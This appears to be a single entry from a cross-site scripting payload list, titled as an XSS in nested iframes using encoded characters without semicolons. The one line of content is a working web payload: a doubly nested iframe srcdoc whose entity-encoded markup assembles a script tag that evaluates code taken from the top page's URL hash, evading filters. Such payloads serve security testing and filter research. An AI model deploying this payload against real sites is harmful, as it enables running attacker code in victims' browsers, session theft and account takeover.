xss in iframe in iframe with encode chars without semicolon
<iframe srcdoc="<iframe srcdoc='&#x26lt&amp#115cript>&&#x23x65val(parent.parent.location.hash.substring`1`)</&amp#115cript>'></iframe>"></iframe>